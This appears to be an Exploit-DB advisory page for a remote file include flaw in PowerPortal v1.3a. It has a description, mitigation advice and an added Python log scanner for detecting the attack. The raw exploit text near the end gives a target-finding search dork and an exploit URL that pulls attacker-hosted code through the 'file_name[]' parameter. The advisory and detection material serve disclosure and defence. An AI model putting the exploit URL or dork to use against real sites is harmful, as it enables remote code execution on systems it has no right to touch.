Vendor: PowerPortal
By: v1per-haCker
CVSS: N/A
Remote File Include
CWE: 98
Product Name: PowerPortal
Affected Version From: v1.3a
Affected Version To: v1.3a
Patch Exists: Yes
Related CWE: N/A
CPE: PowerPortal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PowerPortal Remote File Include

A vulnerability exists in PowerPortal v1.3a, which allows an attacker to include a remote file via the 'file_name[]' parameter in 'index.php'. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of PowerPortal
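
An access-log check for the request shape described above, added here as an example and not part of the original advisory: it flags `index.php` requests whose `file_name[]` value is a URL or stream wrapper rather than a local name. The log entries, client addresses and host name are constructed, and the common/combined log format is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request target inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# file_name[], file_name[0], ... once percent-decoding has been applied.
PARAM_RE = re.compile(r"^file_name(\[[^\]]*\])?$", re.I)
# Values that name a URL or stream wrapper instead of a local file.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:)", re.I)

# Constructed sample entries (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Sep/2006:10:01:02 +0000] "GET /portal/index.php'
    '?file_name[]=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    '198.51.100.4 - - [29/Sep/2006:10:01:09 +0000] "GET /portal/index.php'
    '?file_name[]=news HTTP/1.1" 200 2048',
    '203.0.113.7 - - [29/Sep/2006:10:02:11 +0000] "GET /portal/index.php'
    '?file_name%5B%5D=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 512',
    '198.51.100.4 - - [29/Sep/2006:10:03:40 +0000] "GET /portal/index.php'
    '?ref=http://example.invalid/ HTTP/1.1" 200 2048',
]


def remote_include_values(target):
    """Return the file_name[] values in a request target that point off-host."""
    parts = urlsplit(target)
    # A bare directory request is usually served by index.php as well.
    if not parts.path.lower().endswith(("index.php", "/")):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)  # second decode: flag doubly encoded values too
        if PARAM_RE.match(name) and REMOTE_RE.match(value):
            hits.append(value)
    return hits


def scan(lines):
    """Yield (line_number, client_ip, value) for every suspicious request."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            for value in remote_include_values(match.group(1)):
                yield number, line.split(" ", 1)[0], value


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```
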

Exploit-DB raw data:

#==============================================================================================
# PowerPortal Remote File Include
#===============================================================================================
#
#Critical Level : Dangerous
#
# scripts: PowerPortal
# download: http://www.scripts.com/jump.php?ID=13698
#Version : v1.3a
#dork : Powered by PowerPortal v1.3a
# note not tested on other version :)
#================================================================================================
#Bug in :
#/index.php
#
#================================================================================================
#Vuln Code :
# think :)
#================================================================================================
#
#Exploit :
#
#http://localhost/path_to_PowerPortal/index.php?file_name[]=http://eivlCode.txt?
#
#
#================================================================================================
#Discovered By : v1per-haCker
#
#Contact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad ; RooT-shilL ; hetler_jeddah ; BooB11 ; FaTaL ; ThE-WoLf-KsA ; mohandko ; fooooz ; maVen
#thanx to str0ke :)
#and all members in XP10_hackEr Team
#WWW.XP10.COM
==================================================================================================

# milw0rm.com [2006-09-29]